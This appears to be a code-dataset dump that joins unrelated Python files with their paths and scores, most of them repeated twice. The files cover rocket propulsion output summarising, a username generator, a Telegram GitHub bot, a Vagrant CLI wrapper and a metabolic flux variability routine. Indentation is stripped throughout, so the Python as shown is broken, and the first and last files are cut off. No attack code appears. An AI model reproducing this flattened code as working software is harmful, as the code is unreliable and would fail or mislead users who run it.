# delta_v = exit_mach*local_c*np.log(wet_mass/dry_mass)
ideal_alt = 0.5*(delta_v**2)/g_0 # Simply using delta_K = delta_U; no air resistance
# Add vital data to output dictionary
# TODO: ADD MORE CRITICAL VALUES HERE; add values from data_dict to here
design["max_thrust"] = max_thrust
design["m_dot_max"] = m_dot_max
design["p_cc_max"] = p_cc_max
design["impulse"] = impulse
design["isp"] = isp
design["Mprop_used"] = Mox + Mfuel
design["Mox_initial"] = Mox_initial
design["Mox_used"] = Mox
design["Vox_used"] = Vox
design["Mfuel_initial"] = Mfuel_initial
design["Mfuel_used"] = Mfuel
design["Vfuel_used"] = Vfuel
design["of_ratio"] = of_ratio
design["avg_mdot_ox"] = avg_mdot_ox
design["avg_mdot_fuel"] = avg_mdot_fuel
design["start_p_oxtank"] = start_p_oxtank
design["end_p_oxtank"] = end_p_oxtank
design["start_p_fueltank"] = start_p_fueltank
design["end_p_fueltank"] = end_p_fueltank
design["A_inj_ox_eff"] = data["ox"]["injector_area"] # Only the injector area (orifice sizes)
design["A_inj_fuel_eff"] = data["fuel"]["injector_area"]
design["A_inj_o_only"] = data["ox"]["A_inj_o_only"] # Effective injector area (including Cv)
design["A_inj_f_only"] = data["ox"]["A_inj_f_only"]
design["exit_mach"] = exit_mach
design["burn_time"] = burn_time
design["ideal_delta_v"] = delta_v
design["ideal_alt"] = ideal_alt
# Cut off extraneous significant figures
for key, val in design.items():
design[key] = np.round(val, 4) if val > 0.1 else round(val, 5-int(np.floor(np.log10(abs(val))))-1)
# Export to JSON file
json_obj = json.dumps(design, indent=4, separators=(",", ": "))
prefix = output_file_path[:output_file_path.rfind("/")]
json_path = prefix + "/FinalDesignSummary.json"
with open(json_path, "w+") as f:
f.write(json_obj)
return design, json_path
def get_max_thrust(record: dict) -> tuple:
""" Filters out local spikes and finds max thrust, mdot, and chamber pressure. """
dt_filter = 0.1
dn_thrust_filter = np.ceil(dt_filter/np.mean(np.diff(record["time"])))
a = np.array([1])
b = (1/dn_thrust_filter * np.ones((int(dn_thrust_filter), 1))).flatten()
filtered_thrust = scipy.signal.lfilter(b, a, record["F_thrust"])
filtered_m_dot = scipy.signal.lfilter(b, a, record["m_dot_prop"])
filtered_p_cc = scipy.signal.lfilter(b, a, record["p_cc"])
max_ind = np.argmax(filtered_thrust)
max_thrust = filtered_thrust[max_ind]
m_dot_max = filtered_m_dot[max_ind]
p_cc_max = filtered_p_cc[max_ind]
return max_thrust, m_dot_max, p_cc_max
def get_filtered_max(record: dict, vals: list or np.ndarray) -> float:
dt_filter = 0.1
dn_filter = np.ceil(dt_filter/np.mean(np.diff(record["time"])))
a = np.array([1])
b = (1/dn_filter * np.ones((int(dn_filter), 1))).flatten()
filtered_val = scipy.signal.lfilter(b, a, vals)
max_ind = np.argmax(filtered_val)
return filtered_val[max_ind]
if __name__ == "__main__":
compile_outputs(dict(), "./case-files/test_case_2/PropSimOutput.mat") | 0.339718 | 0.277173 |
import json, random, copy
'''
NOTE: You must run this script from within the amt directory. If you are importing and
calling generate_usernames as a function, make sure to run os.chdir(<path to amt directory>)
Adjectives Source:
https://github.com/dariusk/corpora/raw/master/data/humans/descriptions.json
https://raw.githubusercontent.com/dariusk/corpora/master/data/humans/moods.json
Animals Source:
https://raw.githubusercontent.com/dariusk/corpora/master/data/animals/collateral_adjectives.json
https://raw.githubusercontent.com/dariusk/corpora/master/data/animals/common.json'''
def generate_usernames(num_users):
''' Generates a num_users length list of random usernames based on descriptions of animals.
(i.e. snobby_muskrat, orderly_spider).'''
adjectives = set()
with open('moods.json', 'r') as f:
# https://raw.githubusercontent.com/dariusk/corpora/master/data/humans/moods.json
adjectives.update(json.load(f)['moods'])
with open('descriptions.json', 'r') as f:
# https://github.com/dariusk/corpora/raw/master/data/humans/descriptions.json
adjectives.update(json.load(f)['descriptions'])
# Add inappropriate words to remove here:
adjectives.remove('molested')
adjectives.remove('abused')
animals = set()
with open('collateral_adjectives.json', 'r') as f:
# https://raw.githubusercontent.com/dariusk/corpora/master/data/animals/collateral_adjectives.json
animals.update([x['name'] for x in json.load(f)['animals']])
with open('common.json', 'r') as f:
# https://raw.githubusercontent.com/dariusk/corpora/master/data/animals/common.json
animals.update(json.load(f)['animals'])
animals = list(animals) # should be len 246
adjectives = list(adjectives) # should be len 1018
random.seed(99) # Reproducibility
random.shuffle(animals)
random.shuffle(adjectives)
usernames = []
for i in range(num_users):
if i > len(adjectives):
i -= len(adjectives)
random.shuffle(adjectives)
if i > len(animals):
i -= len(animals)
random.shuffle(animals)
usernames.append('{}_{}'.format(adjectives[i], animals[i]).replace(' ', '_').lower())
return usernames
def alliterate_usernames(animals, adjectives):
''' Generates a list of alliterated usernames, i.e. adored_antelope, feisty_fish
from an input list of animals and adjectives.
len(usernames) <= min(len(animals), len(adjectives))'''
adjectives_copy = copy.deepcopy(list(adjectives))
animals = list(animals)
random.seed(99)
random.shuffle(animals)
random.shuffle(adjectives_copy)
usernames = []
for animal in animals:
adjectives_with_letter = [a for a in adjectives_copy if a[0] == animal[0]]
if len(adjectives_with_letter) > 0:
adj = adjectives_with_letter[0]
adjectives_copy.remove(adj)
usernames.append('{}_{}'.format(adj, animal).replace(' ', '_').lower())
return usernames | annotation/amt/generate_usernames.py | import json, random, copy
'''
NOTE: You must run this script from within the amt directory. If you are importing and
calling generate_usernames as a function, make sure to run os.chdir(<path to amt directory>)
Adjectives Source:
https://github.com/dariusk/corpora/raw/master/data/humans/descriptions.json
https://raw.githubusercontent.com/dariusk/corpora/master/data/humans/moods.json
Animals Source:
https://raw.githubusercontent.com/dariusk/corpora/master/data/animals/collateral_adjectives.json
https://raw.githubusercontent.com/dariusk/corpora/master/data/animals/common.json'''
def generate_usernames(num_users):
''' Generates a num_users length list of random usernames based on descriptions of animals.
(i.e. snobby_muskrat, orderly_spider).'''
adjectives = set()
with open('moods.json', 'r') as f:
# https://raw.githubusercontent.com/dariusk/corpora/master/data/humans/moods.json
adjectives.update(json.load(f)['moods'])
with open('descriptions.json', 'r') as f:
# https://github.com/dariusk/corpora/raw/master/data/humans/descriptions.json
adjectives.update(json.load(f)['descriptions'])
# Add inappropriate words to remove here:
adjectives.remove('molested')
adjectives.remove('abused')
animals = set()
with open('collateral_adjectives.json', 'r') as f:
# https://raw.githubusercontent.com/dariusk/corpora/master/data/animals/collateral_adjectives.json
animals.update([x['name'] for x in json.load(f)['animals']])
with open('common.json', 'r') as f:
# https://raw.githubusercontent.com/dariusk/corpora/master/data/animals/common.json
animals.update(json.load(f)['animals'])
animals = list(animals) # should be len 246
adjectives = list(adjectives) # should be len 1018
random.seed(99) # Reproducibility
random.shuffle(animals)
random.shuffle(adjectives)
usernames = []
for i in range(num_users):
if i > len(adjectives):
i -= len(adjectives)
random.shuffle(adjectives)
if i > len(animals):
i -= len(animals)
random.shuffle(animals)
usernames.append('{}_{}'.format(adjectives[i], animals[i]).replace(' ', '_').lower())
return usernames
def alliterate_usernames(animals, adjectives):
''' Generates a list of alliterated usernames, i.e. adored_antelope, feisty_fish
from an input list of animals and adjectives.
len(usernames) <= min(len(animals), len(adjectives))'''
adjectives_copy = copy.deepcopy(list(adjectives))
animals = list(animals)
random.seed(99)
random.shuffle(animals)
random.shuffle(adjectives_copy)
usernames = []
for animal in animals:
adjectives_with_letter = [a for a in adjectives_copy if a[0] == animal[0]]
if len(adjectives_with_letter) > 0:
adj = adjectives_with_letter[0]
adjectives_copy.remove(adj)
usernames.append('{}_{}'.format(adj, animal).replace(' ', '_').lower())
return usernames | 0.400515 | 0.469155 |
import http.client
import logging
from telegram import Update, ParseMode, InlineKeyboardMarkup, InlineKeyboardButton, Chat
from telegram.ext import TypeHandler, CallbackContext, CommandHandler, MessageHandler, Filters
from bot import settings
from bot.const import TELEGRAM_BOT_TOKEN, DATABASE_FILE, DEBUG
from bot.github import GithubHandler
from bot.githubapi import github_api
from bot.githubupdates import GithubUpdate, GithubAuthUpdate
from bot.menu import reply_menu
from bot.persistence import Persistence
from bot.utils import decode_first_data_entity, deep_link, reply_data_link_filter
from bot.webhookupdater import WebhookUpdater
if DEBUG:
http.client.HTTPConnection.debuglevel = 5
logging.basicConfig(level=logging.DEBUG if DEBUG else logging.INFO,
# [%(filename)s:%(lineno)d]
format='%(asctime)s %(levelname)-8s %(name)s - %(message)s')
def error_handler(update, context: CallbackContext):
logging.warning('Update "%s" caused error "%s"' % (update, context.error))
def start_handler(update: Update, context: CallbackContext):
msg = update.effective_message
# For deep linking
if context.args:
# Get the deep link argument and treat it as a command
args = context.args[0].split('__')
update.effective_message.text = '/' + ' '.join(args)
update.effective_message.entities[0].length = len(args[0]) + 1
context.update_queue.put(update)
return
msg.reply_text(f'👋 Hello, I am {context.bot.name}.\n'
f'I can notify you about events in your public GitHub repositories. '
f'You can also reply to my messages to post comments to GitHub right from Telegram. '
f'I am an improved version of the Telegram GitHub Bot.\n\n'
f'Use /settings to get started.',
disable_notification=True)
def help_handler(update: Update, context: CallbackContext):
msg = update.effective_message
private = update.effective_chat.type == Chat.PRIVATE
steps = [
f'First you must allow me access to the repositories in question. To do this, <a href="https://github.com/apps/telegram-githubbot-revised/installations/new">install</a> my <a href="https://github.com/apps/telegram-githubbot-revised">GitHub App</a> on your account or organisation, and make sure that it has access to the desired repositories.',
f'Use the command /settings to open my settings interface and press the login button. This way I will know who you are.',
f'Add me ({context.bot.name}) to the chat/group in which you would like to receive notifications.',
f'In that chat use /settings to add the repositories you would like to receive notifications for.'
]
if not private:
steps.insert(1, f'Go to a private chat with me, by clicking here: {context.bot.name}.')
text = '\n\n'.join(f'{i + 1}️⃣ {step}' for i, step in enumerate(steps))
msg.reply_text(f'<b>Github notification guide.</b>\n\n{text}\n\n'
f'Note that GitHub Help has more in depth guides on how to install GitHub Apps <a href="https://help.github.com/articles/installing-an-app-in-your-personal-account/#installing-a-github-app-in-your-personal-account">in your personal account</a> or <a href="https://help.github.com/articles/installing-an-app-in-your-organization/#installing-a-github-app-in-your-organization">in your organisation</a> if you are having trouble with step 1.',
reply_markup=InlineKeyboardMarkup([
[InlineKeyboardButton('Add me to a group',
url=f'https://telegram.me/{context.bot.username}?startgroup=start')]
]),
parse_mode=ParseMode.HTML,
disable_web_page_preview=True,
disable_notification=True)
def privacy_handler(update: Update, context: CallbackContext):
msg = update.effective_message
msg.reply_text(
f'🔏 Privacy policy for {context.bot.name}\n\n'
f'GithubBot Revised is an open source bot built by <a href="https://telegram.me/jsmnbom"><NAME></a>.\n\n'
f'GithubBot revised stores GitHub login tokens - if you logout they will be deleted from the server.\n'
f'To prevent overloading GitHub servers, data received from GitHub is also cached according to GitHub server headers.\n\n'
f'THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT '
f'LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. '
f'IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, '
f'WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE '
f'OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n'
f'The MIT-licensed source code for GithubBot revised can be found at <a href="https://github.com/jsmnbom/githubbotrevised">GitHub</a>.',
parse_mode=ParseMode.HTML,
disable_web_page_preview=True,
disable_notification=True
)
def login_handler(update: Update, context):
context.menu_stack = ['settings']
reply_menu(update, context, settings.login_menu)
def delete_job(context: CallbackContext):
context.job.context.delete()
def reply_handler(update: Update, context: CallbackContext):
msg = update.effective_message
if msg.text[0] == '!':
return
data = decode_first_data_entity(msg.reply_to_message.entities)
if not data:
return
comment_type, *data = data
access_token = context.user_data.get('access_token')
if not access_token:
sent_msg = msg.reply_text(f'Cannot reply to {comment_type}, since you are not logged in. '
f'Press button below to go to a private chat with me and login.\n\n'
f'<i>This message will self destruct in 30 sec.</i>',
reply_markup=InlineKeyboardMarkup([[
InlineKeyboardButton('Login', url=deep_link(context.bot, 'login'))
]]),
parse_mode=ParseMode.HTML,
disable_notification=True)
context.job_queue.run_once(delete_job, 30, sent_msg)
return
if comment_type in ('issue', 'pull request'):
repo, number, author = data
text = f'@{author} {msg.text_html}'
github_api.add_issue_comment(repo, number, text, access_token=access_token)
elif comment_type == 'pull request review comment':
repo, number, comment_id, author = data
text = f'@{author} {msg.text_html}'
github_api.add_review_comment(repo, number, comment_id, text, access_token=access_token)
if __name__ == '__main__':
# Not strictly needed anymore since we no longer have custom persistent data
# But since we likely will want it in the future, we keep our custom persistence
persistence = Persistence(DATABASE_FILE)
# Init our very custom webhook handler
updater = WebhookUpdater(TELEGRAM_BOT_TOKEN,
updater_kwargs={'use_context': True,
'persistence': persistence})
dp = updater.dispatcher
# See persistence note above
CallbackContext.github_data = property(lambda self: persistence.github_data)
# Save data every five (5) min
dp.job_queue.run_repeating(lambda *_: persistence.flush(), 5 * 60)
# Telegram updates
dp.add_handler(CommandHandler('start', start_handler))
dp.add_handler(CommandHandler('help', help_handler))
dp.add_handler(CommandHandler('privacy', privacy_handler))
dp.add_handler(CommandHandler('login', login_handler))
settings.add_handlers(dp)
# For commenting on issues/PR/reviews
dp.add_handler(MessageHandler(Filters.reply & reply_data_link_filter, reply_handler))
# Non-telegram updates
github_handler = GithubHandler(dp)
dp.add_handler(TypeHandler(GithubUpdate, github_handler.handle_update))
dp.add_handler(TypeHandler(GithubAuthUpdate, github_handler.handle_auth_update))
dp.add_error_handler(error_handler)
updater.start() | bot/main.py | import http.client
import logging
from telegram import Update, ParseMode, InlineKeyboardMarkup, InlineKeyboardButton, Chat
from telegram.ext import TypeHandler, CallbackContext, CommandHandler, MessageHandler, Filters
from bot import settings
from bot.const import TELEGRAM_BOT_TOKEN, DATABASE_FILE, DEBUG
from bot.github import GithubHandler
from bot.githubapi import github_api
from bot.githubupdates import GithubUpdate, GithubAuthUpdate
from bot.menu import reply_menu
from bot.persistence import Persistence
from bot.utils import decode_first_data_entity, deep_link, reply_data_link_filter
from bot.webhookupdater import WebhookUpdater
if DEBUG:
http.client.HTTPConnection.debuglevel = 5
logging.basicConfig(level=logging.DEBUG if DEBUG else logging.INFO,
# [%(filename)s:%(lineno)d]
format='%(asctime)s %(levelname)-8s %(name)s - %(message)s')
def error_handler(update, context: CallbackContext):
logging.warning('Update "%s" caused error "%s"' % (update, context.error))
def start_handler(update: Update, context: CallbackContext):
msg = update.effective_message
# For deep linking
if context.args:
# Get the deep link argument and treat it as a command
args = context.args[0].split('__')
update.effective_message.text = '/' + ' '.join(args)
update.effective_message.entities[0].length = len(args[0]) + 1
context.update_queue.put(update)
return
msg.reply_text(f'👋 Hello, I am {context.bot.name}.\n'
f'I can notify you about events in your public GitHub repositories. '
f'You can also reply to my messages to post comments to GitHub right from Telegram. '
f'I am an improved version of the Telegram GitHub Bot.\n\n'
f'Use /settings to get started.',
disable_notification=True)
def help_handler(update: Update, context: CallbackContext):
msg = update.effective_message
private = update.effective_chat.type == Chat.PRIVATE
steps = [
f'First you must allow me access to the repositories in question. To do this, <a href="https://github.com/apps/telegram-githubbot-revised/installations/new">install</a> my <a href="https://github.com/apps/telegram-githubbot-revised">GitHub App</a> on your account or organisation, and make sure that it has access to the desired repositories.',
f'Use the command /settings to open my settings interface and press the login button. This way I will know who you are.',
f'Add me ({context.bot.name}) to the chat/group in which you would like to receive notifications.',
f'In that chat use /settings to add the repositories you would like to receive notifications for.'
]
if not private:
steps.insert(1, f'Go to a private chat with me, by clicking here: {context.bot.name}.')
text = '\n\n'.join(f'{i + 1}️⃣ {step}' for i, step in enumerate(steps))
msg.reply_text(f'<b>Github notification guide.</b>\n\n{text}\n\n'
f'Note that GitHub Help has more in depth guides on how to install GitHub Apps <a href="https://help.github.com/articles/installing-an-app-in-your-personal-account/#installing-a-github-app-in-your-personal-account">in your personal account</a> or <a href="https://help.github.com/articles/installing-an-app-in-your-organization/#installing-a-github-app-in-your-organization">in your organisation</a> if you are having trouble with step 1.',
reply_markup=InlineKeyboardMarkup([
[InlineKeyboardButton('Add me to a group',
url=f'https://telegram.me/{context.bot.username}?startgroup=start')]
]),
parse_mode=ParseMode.HTML,
disable_web_page_preview=True,
disable_notification=True)
def privacy_handler(update: Update, context: CallbackContext):
msg = update.effective_message
msg.reply_text(
f'🔏 Privacy policy for {context.bot.name}\n\n'
f'GithubBot Revised is an open source bot built by <a href="https://telegram.me/jsmnbom"><NAME></a>.\n\n'
f'GithubBot revised stores GitHub login tokens - if you logout they will be deleted from the server.\n'
f'To prevent overloading GitHub servers, data received from GitHub is also cached according to GitHub server headers.\n\n'
f'THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT '
f'LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. '
f'IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, '
f'WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE '
f'OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n'
f'The MIT-licensed source code for GithubBot revised can be found at <a href="https://github.com/jsmnbom/githubbotrevised">GitHub</a>.',
parse_mode=ParseMode.HTML,
disable_web_page_preview=True,
disable_notification=True
)
def login_handler(update: Update, context):
context.menu_stack = ['settings']
reply_menu(update, context, settings.login_menu)
def delete_job(context: CallbackContext):
context.job.context.delete()
def reply_handler(update: Update, context: CallbackContext):
msg = update.effective_message
if msg.text[0] == '!':
return
data = decode_first_data_entity(msg.reply_to_message.entities)
if not data:
return
comment_type, *data = data
access_token = context.user_data.get('access_token')
if not access_token:
sent_msg = msg.reply_text(f'Cannot reply to {comment_type}, since you are not logged in. '
f'Press button below to go to a private chat with me and login.\n\n'
f'<i>This message will self destruct in 30 sec.</i>',
reply_markup=InlineKeyboardMarkup([[
InlineKeyboardButton('Login', url=deep_link(context.bot, 'login'))
]]),
parse_mode=ParseMode.HTML,
disable_notification=True)
context.job_queue.run_once(delete_job, 30, sent_msg)
return
if comment_type in ('issue', 'pull request'):
repo, number, author = data
text = f'@{author} {msg.text_html}'
github_api.add_issue_comment(repo, number, text, access_token=access_token)
elif comment_type == 'pull request review comment':
repo, number, comment_id, author = data
text = f'@{author} {msg.text_html}'
github_api.add_review_comment(repo, number, comment_id, text, access_token=access_token)
if __name__ == '__main__':
# Not strictly needed anymore since we no longer have custom persistent data
# But since we likely will want it in the future, we keep our custom persistence
persistence = Persistence(DATABASE_FILE)
# Init our very custom webhook handler
updater = WebhookUpdater(TELEGRAM_BOT_TOKEN,
updater_kwargs={'use_context': True,
'persistence': persistence})
dp = updater.dispatcher
# See persistence note above
CallbackContext.github_data = property(lambda self: persistence.github_data)
# Save data every five (5) min
dp.job_queue.run_repeating(lambda *_: persistence.flush(), 5 * 60)
# Telegram updates
dp.add_handler(CommandHandler('start', start_handler))
dp.add_handler(CommandHandler('help', help_handler))
dp.add_handler(CommandHandler('privacy', privacy_handler))
dp.add_handler(CommandHandler('login', login_handler))
settings.add_handlers(dp)
# For commenting on issues/PR/reviews
dp.add_handler(MessageHandler(Filters.reply & reply_data_link_filter, reply_handler))
# Non-telegram updates
github_handler = GithubHandler(dp)
dp.add_handler(TypeHandler(GithubUpdate, github_handler.handle_update))
dp.add_handler(TypeHandler(GithubAuthUpdate, github_handler.handle_auth_update))
dp.add_error_handler(error_handler)
updater.start() | 0.350199 | 0.068133 |
import argparse
import os
import subprocess
import sys
from jinja2 import Environment, FileSystemLoader
def layzee_parser():
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--provider",
default="libvirt",
help="vagrant provider to deploy on")
parser.add_argument("-m", "--memory",
default="4096",
type=int,
help="memory to allocate to the virtual machine")
parser.add_argument("-c", "--cpu",
default=2,
type=int,
help="CPUs to allocate to the virtual machine")
parser.add_argument("-b", "--box",
default="fedora/24-cloud-base",
help="vagrant box to use")
parser.add_argument("-v", "--volumes",
action="append",
help="host path:guest path")
parser.add_argument("-t", "--type",
default="nfs",
help="which mount type to use")
parser.add_argument("-s", "--shell",
help="path to the shell script to provision the VM")
parser.add_argument("-d", "--directory",
help="directory to place your Vagrantfile in")
parser.add_argument("--stdout",
action="store_true",
help="print Vagrantfile on screen")
return parser
def render_from_jinja(args):
j2_template_path = os.path.normpath(os.path.join(os.path.dirname(__file__)))
j2_env = Environment(loader=FileSystemLoader(j2_template_path))
j2_template = j2_env.get_template("Vagrantfile.j2")
return j2_template.render(**vars(args))
def vagrant_bootstrap(args, rendered):
if not os.path.exists(args.directory):
os.makedirs(args.directory)
with open("{}/Vagrantfile".format(args.directory), "w") as f:
f.write(rendered)
return True
def vagrant_up(directory):
output = subprocess.Popen("VAGRANT_CWD={} vagrant up".format(directory),
stdout=subprocess.PIPE, shell=True, bufsize=1)
for line in iter(output.stdout.readline, ""):
print line,
def main():
parsed = layzee_parser()
args = parsed.parse_args()
if len(sys.argv) < 2:
parsed.print_help()
sys.exit(0)
rendered = render_from_jinja(args)
if args.stdout:
print rendered
sys.exit(0)
if vagrant_bootstrap(args, rendered):
vagrant_up(args.directory) | cli.py | import argparse
import os
import subprocess
import sys
from jinja2 import Environment, FileSystemLoader
def layzee_parser():
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--provider",
default="libvirt",
help="vagrant provider to deploy on")
parser.add_argument("-m", "--memory",
default="4096",
type=int,
help="memory to allocate to the virtual machine")
parser.add_argument("-c", "--cpu",
default=2,
type=int,
help="CPUs to allocate to the virtual machine")
parser.add_argument("-b", "--box",
default="fedora/24-cloud-base",
help="vagrant box to use")
parser.add_argument("-v", "--volumes",
action="append",
help="host path:guest path")
parser.add_argument("-t", "--type",
default="nfs",
help="which mount type to use")
parser.add_argument("-s", "--shell",
help="path to the shell script to provision the VM")
parser.add_argument("-d", "--directory",
help="directory to place your Vagrantfile in")
parser.add_argument("--stdout",
action="store_true",
help="print Vagrantfile on screen")
return parser
def render_from_jinja(args):
j2_template_path = os.path.normpath(os.path.join(os.path.dirname(__file__)))
j2_env = Environment(loader=FileSystemLoader(j2_template_path))
j2_template = j2_env.get_template("Vagrantfile.j2")
return j2_template.render(**vars(args))
def vagrant_bootstrap(args, rendered):
if not os.path.exists(args.directory):
os.makedirs(args.directory)
with open("{}/Vagrantfile".format(args.directory), "w") as f:
f.write(rendered)
return True
def vagrant_up(directory):
output = subprocess.Popen("VAGRANT_CWD={} vagrant up".format(directory),
stdout=subprocess.PIPE, shell=True, bufsize=1)
for line in iter(output.stdout.readline, ""):
print line,
def main():
parsed = layzee_parser()
args = parsed.parse_args()
if len(sys.argv) < 2:
parsed.print_help()
sys.exit(0)
rendered = render_from_jinja(args)
if args.stdout:
print rendered
sys.exit(0)
if vagrant_bootstrap(args, rendered):
vagrant_up(args.directory) | 0.290477 | 0.083106 |
from __future__ import division
import sys, time
sys.path.append('../../')
from tools.globalVariables import *
from fbaTools import fbaTools
from fba import fba
from tools.userError import userError
from tools.core.model import model
from tools.core.compound import compound
from tools.core.reaction import reaction
from pyomo import environ # It was previously: "from coopr import pyomo" for versions of pyomo older than 4.X
# The following lines change the temporary directory for pyomo
from pyutilib.services import TempfileManager
TempfileManager.tempdir = pyomo_tmp_dir
def fva(model, selected_rxns = [], optimization_solver = default_optim_solver, save_to_model = False, results_filename = '', simulation_conditions = '', warmstart = False, warnings = True, stdout_msgs = True):
"""
Performs flux variability analysis
INPUTS:
-------
model:
An instance of class model containing the information
about the metabolic model
selected_rxns:
A list (or tuple) of selected reactions for which FVA should be performed. If no
input is provided FVA is performed for all reactios in the model
optimization_solver:
Name of the LP solver to be used to solve the LP. Current
allowable choices are cplex and gurobi
save_to_model:
If True, it stores the identified bounds on reaciton fluxes in fva_flux_bounds. Otherwise
they are stored in a dictionary whose keys are ids and values are a list of two elements
in the form [fva_LB,fva_UB], whith fva_LB and fva_UB being the FVA LB and UB on fluxes
results_filename:
A string containing the name of the file to save the results in. If an empty string
is provided the results are not saved to a file
simulation_conditions:
A string describing simulation conditions
OUTPUTS:
--------
fva_flux_bounds:
A dictionary with keys being reactions ids and values beiing a list ot two elements
containing the fva flux bounds in the form [LB, UB]
<NAME> - Segre Lab @ Boston University
Last updated: 08-22-2017
"""
# save_to_model
if not isinstance(save_to_model,bool):
raise TypeError('save_to_model must be either True or False')
# selected_rxns
if not isinstance(selected_rxns,list) and not isinstance(selected_rxns, tuple):
raise userError('selected_rxns must be a list or tuple of reaction objects')
# optimization_solver
if not isinstance(optimization_solver,str):
raise TypeError('optimization_solver must be a string')
elif optimization_solver.lower() not in ['gurobi','cplex','gurobi_ampl','cplexamp']:
raise ValueError('Invalid value for optimization_solver. Allowed choices are gurobi and cplex')
# simulation_conditions
if not isinstance(simulation_conditions,str):
raise TypeError('simulation_conditions must be a string')
# warmstart
if not isinstance(warmstart,bool):
raise TypeError('use_warmsart must be either True or False')
# warnings and stdout_msgs
if not isinstance(warnings,bool):
raise TypeError('warnings must be either True or False')
if not isinstance(stdout_msgs,bool):
raise TypeError('stdout_msgs must be either True or False')
# If warmstart is True use gurobi_ampl
if warmstart and optimization_solver in ['gurobi', 'gurobi_ampl']:
optimization_solver = 'gurobi_ampl'
elif warmstart and optimization_solver not in ['gurobi', 'gurobi_ampl']:
# If the solver is not gurobi or gurobi_ampl warmstart should be turned off
# because other solvers such as gurobi will return an error (see fbaTools.py)
warmstart = False
print '**WARNING (fva.py)! warmstart was turned off becasue it can be used only with gurobi or gurobi_ampl as the solver. The specified solver ({}) does not support warmstart'.format(optimization_solver)
# A dictionary holding the FVA flux bounds
fva_flux_bounds = dict([(r.id,[None,None]) for r in model.reactions])
#--- Minimize rxn fluxes ---
for rxn in model.reactions:
rxn.objective_coefficient = 0
# Reactions to consider
if len(selected_rxns) == 0:
rxns_to_consider = model.reactions
else:
rxns_to_consider = selected_rxns
counter = 0
for rxn in rxns_to_consider:
counter += 1
rxn.objective_coefficient = 1
if counter == 1:
fba_model = fba(model = model, optimization_solver = optimization_solver, build_new_optModel = True, maximize = False, save_to_model = False, simulation_conditions = simulation_conditions, warmstart = warmstart, warmings = warnings, stdout_msgs = False, show_solver_output = False)
# From counter 2 on, turn off build_new_optModel and preprocessing and turn on warmstart
elif counter == 2:
fba_model.build_new_optModel = False
# Redefine the objective function if counter > 1
if counter > 1:
fba_model.optModel.del_component('objectiveFunc')
fba_model.optModel.objectiveFunc = environ.Objective(rule = fba_model.objectiveFunc_rule, sense = environ.minimize)
# Supply the current solution as the warm start
for j in fba_model.optModel.J:
fba_model.optModel.v[j] = fba_model.solution['opt_rxnFluxes'][j]
fba_model.run()
if fba_model.solution['exit_flag'] == 'globallyOptimal':
LB = fba_model.solution['objective_value']
else:
raise userError('fba problem to find LB for rxn {} in fva did not end with an optimal solution: exit_flag = {}'.format(rxn.id, fba_model.solution['exit_flag']))
# Store the results
if save_to_model:
rxn.fva_flux_bounds[0] = LB
else:
fva_flux_bounds[rxn.id][0] = LB
rxn.objective_coefficient = 0
#--- Maximize rxn flux ---
for rxn in model.reactions:
rxn.objective_coefficient = 0
counter = 0
for rxn in rxns_to_consider:
counter += 1
rxn.objective_coefficient = 1
if counter == 1:
fba_model = fba(model = model, optimization_solver = optimization_solver, build_new_optModel = True, maximize = True, save_to_model = False, simulation_conditions = simulation_conditions, warmstart = warmstart, warnings = warnings, stdout_msgs = False, show_solver_output = False)
# From counter 2 on, turn off build_new_optModel and preprocessing and turn on warmstart
elif counter == 2:
fba_model.build_new_optModel = False
# Redefine the objective function if counter > 1
if counter > 1:
fba_model.optModel.del_component('objectiveFunc')
fba_model.optModel.objectiveFunc = environ.Objective(rule = fba_model.objectiveFunc_rule, sense = environ.maximize)
# Supply the current solution as the warm start
for j in fba_model.optModel.J:
fba_model.optModel.v[j] = fba_model.solution['opt_rxnFluxes'][j]
fba_model.run()
if fba_model.solution['exit_flag'] == 'globallyOptimal':
UB = fba_model.solution['objective_value']
else:
raise userError('fba problem to find UB for rxn {} in fva ended with a non-optimal solution: exit_flag = {}'.format(rxn.id, fba_model.solution['exit_flag']))
# Store the results
if save_to_model:
rxn.fva_flux_bounds[1] = UB
else:
fva_flux_bounds[rxn.id][1] = UB
rxn.objective_coefficient = 0
# Save results into a file
if results_filename != '':
with open(results_filename,'w') as f:
f.write('fva_flux_bounds = {\n')
for rxn in fva_flux_bounds.keys():
f.write("'{}':{},\n".format(rxn, fva_flux_bounds[rxn]))
f.write('}')
# Return fva_flux_bounds if save_to_model is not True
return fva_flux_bounds | Ali_codes/fba/fva.py | from __future__ import division
import sys, time
sys.path.append('../../')
from tools.globalVariables import *
from fbaTools import fbaTools
from fba import fba
from tools.userError import userError
from tools.core.model import model
from tools.core.compound import compound
from tools.core.reaction import reaction
from pyomo import environ # It was previously: "from coopr import pyomo" for versions of pyomo older than 4.X
# The following lines change the temporary directory for pyomo
from pyutilib.services import TempfileManager
TempfileManager.tempdir = pyomo_tmp_dir
def fva(model, selected_rxns = [], optimization_solver = default_optim_solver, save_to_model = False, results_filename = '', simulation_conditions = '', warmstart = False, warnings = True, stdout_msgs = True):
"""
Performs flux variability analysis
INPUTS:
-------
model:
An instance of class model containing the information
about the metabolic model
selected_rxns:
A list (or tuple) of selected reactions for which FVA should be performed. If no
input is provided FVA is performed for all reactios in the model
optimization_solver:
Name of the LP solver to be used to solve the LP. Current
allowable choices are cplex and gurobi
save_to_model:
